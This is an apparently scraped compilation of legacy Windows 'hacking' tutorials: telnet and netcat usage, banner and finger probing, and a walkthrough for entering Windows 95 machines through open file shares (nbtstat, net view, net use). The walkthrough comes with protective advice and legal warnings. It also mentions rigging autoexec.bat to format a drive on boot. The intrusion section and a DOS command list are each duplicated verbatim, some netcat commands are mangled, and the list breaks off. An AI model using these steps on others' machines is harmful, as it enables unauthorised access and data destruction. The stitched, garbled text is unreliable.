14.On The Left Hand Expand Computer Management>Select Services And Aplications>Services
15.On The Right Hand Scroll down And Right CLick At "Telnet"And Select Restart Option.
16.Leave It As It is
17.Turn To Command Promt Write
c:\telnet Adrian(Press Enter)
it Will Require Login And PassWord
Login:Administrator
PassWord:********(Enter)
*-----------------------------------------------------------
Welcome TO Microsoft Telnet SErver
C:dir(Enter)
Thats It!
Enjoy With Kenreaves!!!
DOS hacking
****************************************************** In this Guide you will learn how to: * Use telnet from Windows * Download web pages via telnet * Get finger information via telnet * Telnet from the DOS command-line * Use netcat * Break into Windows Computers from the Internet Protecting Yourself What can they do The command-line approach The GUI approach Final Words ************************************************************ How to Use Telnet on a Windows Computer Telnet is great little program for doing a couple of interesting things. In fact, if you want to call yourself a hacker, you absolutely MUST be able to telnet! In this lesson you will find out a few of the cool things a hacker can do with telnet. If you are using Win95, you can find telnet in the c:\windows directory, and on NT, in the c:\winnt\system32 directory. There isn't a lot of online help concerning the usage of the program, so my goal is to provide some information for new users. First off, telnet isn't so much an application as it is a protocol. Telnet is protocol that runs over TCP/IP, and was used for connecting to remote computers. It provides a login interface, and you can run command-line programs by typing the commands on your keyboard, and the programs use the resources of the remote machine. The results are displayed in the terminal window on your machine, but the memory and CPU cycles consumed by the program are located on the remote machine. Therefore, telnet functions as a terminal emulation program, emulating a terminal on the remote machine. Now, telnet runs on your Win95 box as a GUI application...that is to say that you can type "telnet" at the command prompt (in Windows 95 this is the MS-DOS prompt), and assuming that your PATH is set correctly, a window titled "telnet" will open. This differs from your ftp program in that all commands are entered in the DOS window. Let's begin by opening telnet. Simply open a DOS window by clicking "start", then "programs", then "MS-DOS", and at the command prompt, type: c:\telnet The window for telnet will open, and you can browse the features of the program from the menu bar. *************************************************** NEWBIE NOTE: In this text file, I am referring only to the telnet program that ships with Win95/NT. If you type "telnet" at the command prompt and you don't get the telnet window, make sure that the program is on your hard drive using the Start -> Find -> Files or Folders command. Also make sure that your path statement includes the Windows directory. There are many other programs available that provide similar functionality, with a lot of other bells and whistles, from any number of software sites. ************************************************* To learn a bit more about telnet, choose Help -> Contents, or Help -> Search for help on... from the menu bar. Read through the files in order to find more detailed explanations of things you may wish to do. For example, in this explanation, I will primarily be covering how to use the application and what it can be used for, but now how to customize the colors for the application. Now, if you choose Connect -> Remote System, you will be presented with a dialog window that will ask you for the remote host, the port and the terminal type. **************************************************** NEWBIE NOTE: For most purposes, you can leave the terminal type on VT100. **************************************************** In the Connect dialog box, you can enter in the host to which you wish to connect, and there is a list box of several ports you can connect to: daytime: May give you the current time on the server. echo: May echo back whatever you type in, and will tell you that the computer you have connected to is alive nd running on the Internet. qotd: May provide you with a quote of the day. chargen: May display a continuous stream of characters, useful for spotting network problems, but may crash your telnet program. telnet: May present you with a login screen. These will only work if the server to which you are trying to connect is running these services. However, you are not limited to just those ports...you can type in any port number you wish. (For more on fun ports, see the GTMHH, "Port Surf's Up.") You will only successfully connect to the port if the service in question is available. What occurs after you connect depends upon the protocol for that particular service. When you are using telnet to connect to the telnet service on a server, you will (in most cases) be presented with a banner and a login prompt. [Note from Carolyn Meinel: Many people have written saying their telnet program fails to connect no matter what host they try to reach. Here's a way to fix your problem. First -- make sure you are already connected to the Internet. If your telnet program still cannot connect to anything, here's how to fix your problem. Click "start" then "settings" then "control panel." Then click "Internet" then "connection." This screen will have two boxes that may or may not be checked. The top one says "connect to the Internet as needed." If that box is checked, uncheck it -- but only uncheck it if you already have been having problems connecting. The bottom box says "connect through a proxy server." If that box is checked, you probably are on a local area network and your systems administrator doesn't allow you to use telnet.] ********************************************* NEWBIE NOTE: It's not a good idea to connect to a host on which you don't have a valid account. In your attempts to guess a username and password, all you will do is fill the log files on that host. From there, you can very easily be traced, and your online service provider will probably cancel your account. ********************************************** Now, you can also use telnet to connect to other ports, such as ftp (21), smtp (25), pop3 (110), and even http (80). When you connect to ftp, smtp, and pop3, you will be presented with a banner, or a line of text that displays some information about the service. This will give you a clue as to the operating system running on the host computer, or it may come right out and tell you what the operating system is...for instance, AIX, Linux, Solaris, or NT. If you successfully connect to port 80, you will see a blank screen. This indicates, again, that you have successfully completed the TCP negotiation and you have a connection. Now, what you do from there is up to you. You can simply disconnect with the knowledge that, yes, there is a service running on port 80, or you can use your knowledge of the HTTP protocol to retrieve the HTML source for web pages on the server. How to Download Web Pages Via Telnet To retrieve a web page for a server using telnet, you need to connect to that server on port 80, generally. Some servers may use a different port number, such as 8080, but most web servers run on port 80. The first thing you need to do is click on Terminal -> Preferences and make sure that there is a check in the Local Echo box. Then, since most web pages will generally take up more than a single screen, enable logging by clicking Terminal -> Start Logging... and select a location and filename. Keep in mind that as long as logging is on, and the same file is being logged to, all new information will be appended to the file, rather than overwriting the original file. This is useful if you want to record several sessions, and edit out the extraneous information using Notepad. Now, connect the remote host, and if your connection is successful, type in: GET / HTTP/1.0 and hit enter twice. ************************************************** NEWBIE NOTE: Make sure that you hit enter twice...this is part of the HTTP protocol. The single / after GET tells the server to return the default index file, which is generally "index.html". However, you can enter other filenames, as well. ************************************************* You should have seen a bunch of text scroll by on the screen. Now you can open the log file in Notepad, and you will see the HTML code for the page, just as though you had chosen the View Source option from your web browser. You will also get some additional information...the headers for the file will contain some information about the server. For example: HTTP/1.0 200 Document follows Date: Thu, 04 Jun 1998 14:46:46 GMT Server: NCSA/1.5.2 Last-modified: Thu, 19 Feb 1998 17:44:13 GMT Content-type: text/html Content-length: 3196 One particularly interesting piece of information is the server name. This refers to the web server software that is running and serving web pages. You may see other names in this field, such as versions of Microsoft IIS, Purveyor, WebSite, etc. This will give you a clue as to the underlying operating system running on the server. ************************************************* SYSADMIN NOTE: This technique, used in conjunction with a database of exploits on web servers, can be particularly annoying. Make sure you keep up on exploits and the appropriate security patches from your web server and operating system vendors. ************************************************* ************************************************* NEWBIE NOTE: This technique of gathering web pages is perfectly legal. You aren't attempting to compromise the target system, you are simply doing by hand what your web browser does for you automatically. Of course, this technique will not load images and Java applets for you. ************************************************ Getting Finger Information Via Telnet By now, you've probably heard or read a lot about finger. It doesn't seem like a very useful service, and many sysadmins disable the service because it provides information on a particular user, information an evil hacker can take advantage of. Win95 doesn't ship with a finger client, but NT does. You can download finger clients for Win95 from any number of software sites. But why do that when you have a readily available client in telnet? The finger daemon or server runs on port 79, so connect to a remote host on that port. If the service is running, you will be presented with a blank screen. **************************************************** NEWBIE NOTE: NT doesn't ship with a finger daemon (A daemon is a program on the remote computer which waits for people like you to connect to it), so generally speaking, and server that you find running finger will be a Unix box. I say "generally" because there are third-party finger daemons available and someone may want to run one on their NT computer. **************************************************** The blank screen indicates that the finger daemon is waiting for input. If you have a particular user that you are interested in, type in the username and hit enter. A response will be provided, and the daemon will disconnect the client. If you don't know a particular username, you can start by simply hitting enter. In some cases, you may get a response such as "No one logged on." Or you may get information of all currently logged on users. It all depends on whether or not the sysadmin has chosen to enable certain features of the daemon. You can also try other names, such as "root", "daemon", "ftp", "bin", etc. Another neat trick to try out is something that I have seen referred to as "finger forwarding". To try this out, you need two hosts that run finger. Connect to the first host, host1.com, and enter the username that you are interested in. Then go to the second host, and enter: user@host1.com You should see the same information! Again, this all depends upon the configuration of the finger daemon. Using Telnet from the Command Line Now, if you want to show your friends that you a "real man" because "real men don't need no stinkin' GUIs", well just open up a DOS window and type: c:\>telnet and the program will automatically attempt to connect to the host on the designated port for you. Using Netcat Let me start by giving a mighty big thanks to Weld Pond from L0pht for producing the netcat program for Windows NT. To get a copy of this program, which comes with source code, simply go to: http://www.l0pht.com/~weld NOTE: The first character of "l0pht: is the letter "l". The second character is a zero, not an "o". I know that the program is supposed to run on NT, but I have seen it run on Win95. It's a great little program that can be used to do some of the same things as telnet. However, there are advantages to using netcat...for one, it's a command-line program, and it can be included in a batch file. In fact, you can automate multiple calls to netcat in a batch file, saving the results to a text file. ************************************************** NEWBIE NOTE: For more information on batch files, see previous versions of the Guide To (mostly) Harmless Hacking, Getting Serious with Windows series ...one of them dealt with basic batch file programming. ************************************************** Before using netcat, take a look at the readme.txt file provided in the zipped archive you downloaded. It goes over the instructions on how to download web pages using netcat, similar to what I described earlier using telnet. There are two ways to go about getting finger information using netcat. The first is in interactive mode. Simply type: c:\>nc 79 If the daemon is running, you won't get a command prompt back. If this is the case, type in the username and hit enter. Or use the automatic mode by first creating a text file containing the username of interest. For example, I typed: c:\>edit root and entered the username "root", without the quotes. Then from the command prompt, type: c:\>nc 79 <>nc 79 <> nc.log to create the file nc.log, or: c:\>nc 79 <>> nc.log to append the response to the end of nc.log. NOTE: Make sure that you use spaces between the redirection operators.
How to Break into a Windows 95 machine Connected to the Internet Disclaimer The intent of this file is NOT to provide a step-by-step guide to accessing a Win95 computer while it is connected to the Internet. The intent is show you how to protect yourself. There are no special tools needed to access a remote Win95 machine...everything you need is right there on your Win95 system! Two methods will be described...the command-line approach and the GUI approach. Protecting Yourself First, the method of protecting yourself needs to be made perfectly clear. DON'T SHARE FILES!! I can't stress that enough. If you are a home user, and you are connecting a Win95 computer to the Internet via some dial-up method, disable sharing. If you must share, use a strong password...8 characters minimum, a mix of upper and lower case letters and numbers, change the password every now and again. If you need to transmit the password to someone, do so over the phone or by written letter. To disable sharing, click on My Computer -> Control Panel -> Network -> File and Print Sharing. In the dialog box that appears, uncheck both boxes. It's that easy. What Can They Do? What can someone do? Well, lots of stuff, but it largely depends on what shares are available. If someone is able to share a printer from your machine, they can send you annoying letters and messages. This consumes time, your printer ink/toner, and your paper. If they are able to share a disk share, what they can do largely depends upon what's in that share. The share appears as another directory on the attacker's machine, so any programs they run will be consuming their own resources...memory, cpu cycles, etc. But if the attacker has read and write access to those disk shares, then you're in trouble. If you take work home, your files may be vulnerable. Initialization and configuration files can be searched for passwords. Files can be modified and deleted. A particularly nasty thing to do is adding a line to your autoexec.bat file so that the next time your computer is booted, the hard drive is formatted without any prompting from the user. Bad ju-ju, indeed. ** The command-line approach ** Okay, now for the part that should probably be titled "How they do it". All that is needed is the IP address of the remote machine. Now open up a DOS window, and at the command prompt, type: c:\>nbtstat -A [ip_addr] If the remote machine is connected to the Internet and the ports used for sharing are not blocked, you should see something like: NetBIOS Remote Machine Name Table Name Type Status --------------------------------------------- NAME <00> UNIQUE Registered DOMAIN <00> GROUP Registered NAME <03> UNIQUE Registered USERNAME <03> UNIQUE Registered MAC Address = 00-00-00-00-00-00 This machine name table shows the machine and domain names, a logged-on username, and the address of the Ethernet adapter (the information has been obfuscated for instructional purposes). **Note: This machine, if unpatched and not protected with a firewall or packet-filter router, may be vulnerable to a range of denial of service attacks, which seem to be fairly popular, largely because they require no skill or knowledge to perpetrate. The key piece of information that you are looking for is in the Type column. A machine that has sharing enabled will have a hex code of "<20>". **Note: With the right tools, it is fairly simple for a sysadmin to write a batch file that combs a subnet or her entire network, looking for client machines with sharing enabled. This batch file can then be run at specific times...every day at 2:00 am, only on Friday evenings or weekends, etc. If you find a machine with sharing enabled, the next thing to do is type the following command: c:\>net view \\[ip_addr] Now, your response may be varied. You may find that there are no shares on the list, or that there are several shares available. Choose which share you would like to connect to, and type the command: c:\>net use g: \\[ip_addr]\[share_name] You will likely get a response that the command was completed successfully. If that is the case, type: c:\>cd g: or which ever device name you decided to use. You can now view what exists on that share using the dir commands, etc. Now, you may be presented with a password prompt when you ssue the above command. If that is the case, typical "hacker" (I shudder at that term) methods may be used. ** The GUI approach ** After issuing the nbtstat command, you can opt for the GUI approach to accessing the shares on that machine. To do so, make sure that you leave the DOS window open, or minimized...don't close it. Now, use Notepad to open this file: c:\windows\lmhosts.sam Read over the file, and then open create another file in Notepad, called simply "Lmhosts", without an extension. The file should contain the IP address of the host, the NetBIOS name of the host (from the nbtstat command), and #PRE, separated by tabs. Once you have added this information, save it, and minimize the window. In the DOS command window, type: c:\>nbtstat -R This command reloads the cache from the Lmhosts file you just created. Now, click on Start -> Find -> Computer, and type in the NetBIOS name of the computer...the same one you added to the lmhosts file. If your attempt to connect to the machine is successful, you should be presented with a window containing the available shares. You may be presented with a password prompt window, but again, typical "hacker" (again, that term grates on me like fingernails on a chalk board, but today, it seems that it's all folks understand) techniques may be used to break the password. ************************************************ Note from Carolyn Meinel: Want to try this stuff without winding up in jail or getting expelled from school? Get a friend to give you permission to try to break in. First, you will need his or her IP address. Usually this will be different every time your friend logs on. You friend can learn his or her IP address by going to the DOS prompt while online and giving the command "netstat -r". Something like this should show up: C:\WINDOWS>netstat -r Route Table Active Routes: Network Address Netmask Gateway Address Interface Metric 0.0.0.0 0.0.0.0 198.999.176.84 198.999.176.84 1 127.0.0.0 255.0.0.0 127.0.0.1 127.0.0.1 1 198.999.176.0 255.255.255.0 198.999.176.84 198.999.176.84 1 198.999.176.84 255.255.255.255 127.0.0.1 127.0.0.1 1 198.999.176.255 255.255.255.255 198.999.176.84 198.999.176.84 1 224.0.0.0 224.0.0.0 198.999.176.84 198.999.176.84 1 255.255.255.255 255.255.255.255 198.999.176.84 0.0.0.0 1 Your friend's IP address should be under "Gateway Address." Ignore the 127.0.0.1 as this will show up for everyone and simply means "locahost" or "my own computer." If in doubt, break the Internet connection and then get online again. The number that changes is the IP address of your friend's computer. *************************************************** ************************************************** Evil Genius tip: Here is something really scary. In your shell account give the "netstat" command. If your ISP allows you to use it, you might be able to get the dynamically assigned IP addresses of people from all over the world -- everyone who is browsing a Web site hosted by your ISP, everyone using ftp, spammers you might catch red-handed in the act of forging email on your ISP, guys up at 2AM playing on multiuser dungeons, IRC users, in fact you will see everyone who is connected to your ISP! **************************************************** *************************************************** YOU CAN GO TO JAIL WARNING: If you find a Windows 95 box on the Internet with file sharing enabled and no password protection, you can still get in big trouble for exploiting it. It's just like finding a house whose owner forgot to lock the door -- you still are in trouble if someone catches you inside. Tell temptation to take a hike! ************************************************ Final Words Please remember that this Guide is for instructional purposes only and is meant to educate the sysadmin and user alike. If someone uses this information to gain access to a system which they have no permission or business messing with, I (keydet) cannot be responsible for the outcome. If you are intending to try this information out, do so with the consent and permission of a friend. If there are questions, comments or any doubts then feel free to ask me heregreetz,
How to Break into a Windows 95 machine Connected to the Internet Disclaimer The intent of this file is NOT to provide a step-by-step guide to accessing a Win95 computer while it is connected to the Internet. The intent is show you how to protect yourself. There are no special tools needed to access a remote Win95 machine...everything you need is right there on your Win95 system! Two methods will be described...the command-line approach and the GUI approach. Protecting Yourself First, the method of protecting yourself needs to be made perfectly clear. DON'T SHARE FILES!! I can't stress that enough. If you are a home user, and you are connecting a Win95 computer to the Internet via some dial-up method, disable sharing. If you must share, use a strong password...8 characters minimum, a mix of upper and lower case letters and numbers, change the password every now and again. If you need to transmit the password to someone, do so over the phone or by written letter. To disable sharing, click on My Computer -> Control Panel -> Network -> File and Print Sharing. In the dialog box that appears, uncheck both boxes. It's that easy. What Can They Do? What can someone do? Well, lots of stuff, but it largely depends on what shares are available. If someone is able to share a printer from your machine, they can send you annoying letters and messages. This consumes time, your printer ink/toner, and your paper. If they are able to share a disk share, what they can do largely depends upon what's in that share. The share appears as another directory on the attacker's machine, so any programs they run will be consuming their own resources...memory, cpu cycles, etc. But if the attacker has read and write access to those disk shares, then you're in trouble. If you take work home, your files may be vulnerable. Initialization and configuration files can be searched for passwords. Files can be modified and deleted. A particularly nasty thing to do is adding a line to your autoexec.bat file so that the next time your computer is booted, the hard drive is formatted without any prompting from the user. Bad ju-ju, indeed. ** The command-line approach ** Okay, now for the part that should probably be titled "How they do it". All that is needed is the IP address of the remote machine. Now open up a DOS window, and at the command prompt, type: c:\>nbtstat -A [ip_addr] If the remote machine is connected to the Internet and the ports used for sharing are not blocked, you should see something like: NetBIOS Remote Machine Name Table Name Type Status --------------------------------------------- NAME <00> UNIQUE Registered DOMAIN <00> GROUP Registered NAME <03> UNIQUE Registered USERNAME <03> UNIQUE Registered MAC Address = 00-00-00-00-00-00 This machine name table shows the machine and domain names, a logged-on username, and the address of the Ethernet adapter (the information has been obfuscated for instructional purposes). **Note: This machine, if unpatched and not protected with a firewall or packet-filter router, may be vulnerable to a range of denial of service attacks, which seem to be fairly popular, largely because they require no skill or knowledge to perpetrate. The key piece of information that you are looking for is in the Type column. A machine that has sharing enabled will have a hex code of "<20>". **Note: With the right tools, it is fairly simple for a sysadmin to write a batch file that combs a subnet or her entire network, looking for client machines with sharing enabled. This batch file can then be run at specific times...every day at 2:00 am, only on Friday evenings or weekends, etc. If you find a machine with sharing enabled, the next thing to do is type the following command: c:\>net view \\[ip_addr] Now, your response may be varied. You may find that there are no shares on the list, or that there are several shares available. Choose which share you would like to connect to, and type the command: c:\>net use g: \\[ip_addr]\[share_name] You will likely get a response that the command was completed successfully. If that is the case, type: c:\>cd g: or which ever device name you decided to use. You can now view what exists on that share using the dir commands, etc. Now, you may be presented with a password prompt when you ssue the above command. If that is the case, typical "hacker" (I shudder at that term) methods may be used. ** The GUI approach ** After issuing the nbtstat command, you can opt for the GUI approach to accessing the shares on that machine. To do so, make sure that you leave the DOS window open, or minimized...don't close it. Now, use Notepad to open this file: c:\windows\lmhosts.sam Read over the file, and then open create another file in Notepad, called simply "Lmhosts", without an extension. The file should contain the IP address of the host, the NetBIOS name of the host (from the nbtstat command), and #PRE, separated by tabs. Once you have added this information, save it, and minimize the window. In the DOS command window, type: c:\>nbtstat -R This command reloads the cache from the Lmhosts file you just created. Now, click on Start -> Find -> Computer, and type in the NetBIOS name of the computer...the same one you added to the lmhosts file. If your attempt to connect to the machine is successful, you should be presented with a window containing the available shares. You may be presented with a password prompt window, but again, typical "hacker" (again, that term grates on me like fingernails on a chalk board, but today, it seems that it's all folks understand) techniques may be used to break the password. ************************************************ Note from Carolyn Meinel: Want to try this stuff without winding up in jail or getting expelled from school? Get a friend to give you permission to try to break in. First, you will need his or her IP address. Usually this will be different every time your friend logs on. You friend can learn his or her IP address by going to the DOS prompt while online and giving the command "netstat -r". Something like this should show up: C:\WINDOWS>netstat -r Route Table Active Routes: Network Address Netmask Gateway Address Interface Metric 0.0.0.0 0.0.0.0 198.999.176.84 198.999.176.84 1 127.0.0.0 255.0.0.0 127.0.0.1 127.0.0.1 1 198.999.176.0 255.255.255.0 198.999.176.84 198.999.176.84 1 198.999.176.84 255.255.255.255 127.0.0.1 127.0.0.1 1 198.999.176.255 255.255.255.255 198.999.176.84 198.999.176.84 1 224.0.0.0 224.0.0.0 198.999.176.84 198.999.176.84 1 255.255.255.255 255.255.255.255 198.999.176.84 0.0.0.0 1 Your friend's IP address should be under "Gateway Address." Ignore the 127.0.0.1 as this will show up for everyone and simply means "locahost" or "my own computer." If in doubt, break the Internet connection and then get online again. The number that changes is the IP address of your friend's computer. *************************************************** ************************************************** Evil Genius tip: Here is something really scary. In your shell account give the "netstat" command. If your ISP allows you to use it, you might be able to get the dynamically assigned IP addresses of people from all over the world -- everyone who is browsing a Web site hosted by your ISP, everyone using ftp, spammers you might catch red-handed in the act of forging email on your ISP, guys up at 2AM playing on multiuser dungeons, IRC users, in fact you will see everyone who is connected to your ISP! **************************************************** *************************************************** YOU CAN GO TO JAIL WARNING: If you find a Windows 95 box on the Internet with file sharing enabled and no password protection, you can still get in big trouble for exploiting it. It's just like finding a house whose owner forgot to lock the door -- you still are in trouble if someone catches you inside. Tell temptation to take a hike! ************************************************ Final Words Please remember that this Guide is for instructional purposes only and is meant to educate the sysadmin and user alike. If someone uses this information to gain access to a system which they have no permission or business messing with, I (keydet) cannot be responsible for the outcome. If you are intending to try this information out, do so with the consent and permission of a friend. If there are questions, comments or any doubts then feel free to ask me heregreetz,
all DOS commands!!
There are some hidden dos commands which u can't recognise by typing help in cmd
Here they are with description
COMMANDS:--
ANSI.SYS
Defines functions that change display graphics, control cursor movement, and reassign keys.
APPEND
Causes MS-DOS to look in other directories when editing a file or running a command.
ARP
Displays, adds, and removes arp information from network devices.
ASSIGN
Assign a drive letter to an alternate letter.
ASSOC
View the file associations.
AT
Schedule a time to execute commands or programs.
ATMADM
Lists connections and addresses seen by Windows ATM call manager.
ATTRIB
Display and change file attributes.
BATCH
Recovery console command that executes a series of commands in a file.
BOOTCFG
Recovery console command that allows a user to view, modify, and rebuild the boot.ini
BREAK
Enable / disable CTRL + C feature.
CACLS
View and modify file ACL's.
CALL
Calls a batch file from another batch file.
CD
Changes directories.
CHCP
Supplement the International keyboard and character set information.
CHDIR
Changes directories.
CHKDSK
Check the hard disk drive running FAT for errors.
CHKNTFS
Check the hard disk drive running NTFS for errors.
CHOICE
Specify a listing of multiple options within a batch file.
CLS
Clears the screen.
CMD
Opens the command interpreter.
COLOR
Easily change the foreground and background color of the MS-DOS window.
COMMAND
Opens the command interpreter.
COMP
Compares files.
COMPACT
Compresses and uncompress files.
CONTROL
Open Control Panel icons from the MS-DOS prompt.
CONVERT
Convert FAT to NTFS.
COPY
Copy one or more files to an alternate location.
CTTY
Change the computers input/output devices.
DATE
View or change the systems date.
DEBUG
Debug utility to create assembly programs to modify hardware settings.
DEFRAG
Re-arrange the hard disk drive to help with loading programs.
DEL
Deletes one or more files.
DELETE
Recovery console command that deletes a file.
DELTREE
Deletes one or more files and/or directories.
DIR
List the contents of one or more directory.
DISABLE
Recovery console command that disables Windows system services or drivers.
DISKCOMP
Compare a disk with another disk.
DISKCOPY
Copy the contents of one disk and place them on another disk.
DOSKEY
Command to view and execute commands that have been run in the past.
DOSSHELL
A GUI to help with early MS-DOS users.
DRIVPARM
Enables overwrite of original device drivers.
ECHO
Displays messages and enables and disables echo.
EDIT
View and edit files.
EDLIN
View and edit files.
EMM386
Load extended Memory Manager.
ENABLE
Recovery console command to enable a disable service or driver.
ENDLOCAL
Stops the localization of the environment changes enabled by the setlocal command.
ERASE
Erase files from computer.
EXIT
Exit from the command interpreter.
EXPAND
Expand a Microsoft Windows file back to it's original format.
EXTRACT
Extract files from the Microsoft Windows cabinets.
FASTHELP
Displays a listing of MS-DOS commands and information about them.
FC
Compare files.
FDISK
Utility used to create partitions on the hard disk drive.
FIND
Search for text within a file.
FINDSTR
Searches for a string of text within a file.
FIXBOOT
Writes a new boot sector.
FIXMBR
Writes a new boot record to a disk drive.
FOR
Boolean used in batch files.
FORMAT
Command to erase and prepare a disk drive.
FTP
Command to connect and operate on a FTP server.
FTYPE
Displays or modifies file types used in file extension associations.
GOTO
Moves a batch file to a specific label or location.
GRAFTABL
Show extended characters in graphics mode.
HELP
Display a listing of commands and brief explanation.
IF
Allows for batch files to perform conditional processing.
IFSHLP.SYS
32-bit file manager.
IPCONFIG
Network command to view network adapter settings and assigned values.
KEYB
Change layout of keyboard.
LABEL
Change the label of a disk drive.
LH
Load a device driver in to high memory.
LISTSVC
Recovery console command that displays the services and drivers.
LOADFIX
Load a program above the first 64k.
LOADHIGH
Load a device driver in to high memory.
LOCK
Lock the hard disk drive.
LOGON
Recovery console command to list installations and enable administrator login.
MAP
Displays the device name of a drive.
MD
Command to create a new directory.
MEM
Display memory on system.
MKDIR
Command to create a new directory.
MODE
Modify the port or display settings.
MORE
Display one page at a time.
MOVE
Move one or more files from one directory to another directory.
MSAV
Early Microsoft Virus scanner.
MSD
Diagnostics utility.
MSCDEX
Utility used to load and provide access to the CD-ROM.
NBTSTAT
Displays protocol statistics and current TCP/IP connections using NBT
NET
Update, fix, or view the network or network settings
NETSH
Configure dynamic and static network information from MS-DOS.
NETSTAT
Display the TCP/IP network protocol statistics and information.
NLSFUNC
Load country specific information.
NSLOOKUP
Look up an IP address of a domain or host on a network.
PATH
View and modify the computers path location.
PATHPING
View and locate locations of network latency.
PAUSE
Command used in batch files to stop the processing of a command.
PING
Test / send information to another network computer or network device.
POPD
Changes to the directory or network path stored by the pushd command.
POWER
Conserve power with computer portables.
PRINT
Prints data to a printer port.
PROMPT
View and change the MS-DOS prompt.
PUSHD
Stores a directory or network path in memory so it can be returned to at any time.
QBASIC
Open the QBasic.
RD
Removes an empty directory.
REN
Renames a file or directory.
RENAME
Renames a file or directory.
RMDIR
Removes an empty directory.
ROUTE
View and configure windows network route tables.
RUNAS
Enables a user to execute a program on another computer.
SCANDISK
Run the scandisk utility.
SCANREG
Scan registry and recover registry from errors.
SET
Change one variable or string to another.
SETLOCAL
Enables local environments to be changed without affecting anything else.
SETVER
Change MS-DOS version to trick older MS-DOS programs.
SHARE
Installs support for file sharing and locking capabilities.
SHIFT
Changes the position of replaceable parameters in a batch program.
SHUTDOWN
Shutdown the computer from the MS-DOS prompt.
SMARTDRV
Create a disk cache in conventional memory or extended memory.
SORT
Sorts the input and displays the output to the screen.
START
Start a separate window in Windows from the MS-DOS prompt.
SUBST
Substitute a folder on your computer for another drive letter.
SWITCHES
Remove add functions from MS-DOS.
SYS
Transfer system files to disk drive.
TELNET
Telnet to another computer / device from the prompt.
TIME
View or modify the system time.
TITLE
Change the title of their MS-DOS window.
TRACERT
Visually view a network packets route across a network.
TREE
View a visual tree of the hard disk drive.
TYPE
Display the contents of a file.
UNDELETE
Undelete a file that has been deleted.
UNFORMAT
Unformat a hard disk drive.
UNLOCK
Unlock a disk drive.
VER
Display the version information.
VERIFY
Enables or disables the feature to determine if files have been written properly.
VOL
Displays the volume information about the designated drive.
XCOPY
Copy multiple files, directories, and/or drives from one location to another.
Here they are with description
COMMANDS:--
ANSI.SYS
Defines functions that change display graphics, control cursor movement, and reassign keys.
APPEND
Causes MS-DOS to look in other directories when editing a file or running a command.
ARP
Displays, adds, and removes arp information from network devices.
ASSIGN
Assign a drive letter to an alternate letter.
ASSOC
View the file associations.
AT
Schedule a time to execute commands or programs.
ATMADM
Lists connections and addresses seen by Windows ATM call manager.
ATTRIB
Display and change file attributes.
BATCH
Recovery console command that executes a series of commands in a file.
BOOTCFG
Recovery console command that allows a user to view, modify, and rebuild the boot.ini
BREAK
Enable / disable CTRL + C feature.
CACLS
View and modify file ACL's.
CALL
Calls a batch file from another batch file.
CD
Changes directories.
CHCP
Supplement the International keyboard and character set information.
CHDIR
Changes directories.
CHKDSK
Check the hard disk drive running FAT for errors.
CHKNTFS
Check the hard disk drive running NTFS for errors.
CHOICE
Specify a listing of multiple options within a batch file.
CLS
Clears the screen.
CMD
Opens the command interpreter.
COLOR
Easily change the foreground and background color of the MS-DOS window.
COMMAND
Opens the command interpreter.
COMP
Compares files.
COMPACT
Compresses and uncompress files.
CONTROL
Open Control Panel icons from the MS-DOS prompt.
CONVERT
Convert FAT to NTFS.
COPY
Copy one or more files to an alternate location.
CTTY
Change the computers input/output devices.
DATE
View or change the systems date.
DEBUG
Debug utility to create assembly programs to modify hardware settings.
DEFRAG
Re-arrange the hard disk drive to help with loading programs.
DEL
Deletes one or more files.
DELETE
Recovery console command that deletes a file.
DELTREE
Deletes one or more files and/or directories.
DIR
List the contents of one or more directory.
DISABLE
Recovery console command that disables Windows system services or drivers.
DISKCOMP
Compare a disk with another disk.
DISKCOPY
Copy the contents of one disk and place them on another disk.
DOSKEY
Command to view and execute commands that have been run in the past.
DOSSHELL
A GUI to help with early MS-DOS users.
DRIVPARM
Enables overwrite of original device drivers.
ECHO
Displays messages and enables and disables echo.
EDIT
View and edit files.
EDLIN
View and edit files.
EMM386
Load extended Memory Manager.
ENABLE
Recovery console command to enable a disable service or driver.
ENDLOCAL
Stops the localization of the environment changes enabled by the setlocal command.
ERASE
Erase files from computer.
EXIT
Exit from the command interpreter.
EXPAND
Expand a Microsoft Windows file back to it's original format.
EXTRACT
Extract files from the Microsoft Windows cabinets.
FASTHELP
Displays a listing of MS-DOS commands and information about them.
FC
Compare files.
FDISK
Utility used to create partitions on the hard disk drive.
FIND
Search for text within a file.
FINDSTR
Searches for a string of text within a file.
FIXBOOT
Writes a new boot sector.
FIXMBR
Writes a new boot record to a disk drive.
FOR
Boolean used in batch files.
FORMAT
Command to erase and prepare a disk drive.
FTP
Command to connect and operate on a FTP server.
FTYPE
Displays or modifies file types used in file extension associations.
GOTO
Moves a batch file to a specific label or location.
GRAFTABL
Show extended characters in graphics mode.
HELP
Display a listing of commands and brief explanation.
IF
Allows for batch files to perform conditional processing.
IFSHLP.SYS
32-bit file manager.
IPCONFIG
Network command to view network adapter settings and assigned values.
KEYB
Change layout of keyboard.
LABEL
Change the label of a disk drive.
LH
Load a device driver in to high memory.
LISTSVC
Recovery console command that displays the services and drivers.
LOADFIX
Load a program above the first 64k.
LOADHIGH
Load a device driver in to high memory.
LOCK
Lock the hard disk drive.
LOGON
Recovery console command to list installations and enable administrator login.
MAP
Displays the device name of a drive.
MD
Command to create a new directory.
MEM
Display memory on system.
MKDIR
Command to create a new directory.
MODE
Modify the port or display settings.
MORE
Display one page at a time.
MOVE
Move one or more files from one directory to another directory.
MSAV
Early Microsoft Virus scanner.
MSD
Diagnostics utility.
MSCDEX
Utility used to load and provide access to the CD-ROM.
NBTSTAT
Displays protocol statistics and current TCP/IP connections using NBT
NET
Update, fix, or view the network or network settings
NETSH
Configure dynamic and static network information from MS-DOS.
NETSTAT
Display the TCP/IP network protocol statistics and information.
NLSFUNC
Load country specific information.
NSLOOKUP
Look up an IP address of a domain or host on a network.
PATH
View and modify the computers path location.
PATHPING
View and locate locations of network latency.
PAUSE
Command used in batch files to stop the processing of a command.
PING
Test / send information to another network computer or network device.
POPD
Changes to the directory or network path stored by the pushd command.
POWER
Conserve power with computer portables.
Prints data to a printer port.
PROMPT
View and change the MS-DOS prompt.
PUSHD
Stores a directory or network path in memory so it can be returned to at any time.
QBASIC
Open the QBasic.
RD
Removes an empty directory.
REN
Renames a file or directory.
RENAME
Renames a file or directory.
RMDIR
Removes an empty directory.
ROUTE
View and configure windows network route tables.
RUNAS
Enables a user to execute a program on another computer.
SCANDISK
Run the scandisk utility.
SCANREG
Scan registry and recover registry from errors.
SET
Change one variable or string to another.
SETLOCAL
Enables local environments to be changed without affecting anything else.
SETVER
Change MS-DOS version to trick older MS-DOS programs.
SHARE
Installs support for file sharing and locking capabilities.
SHIFT
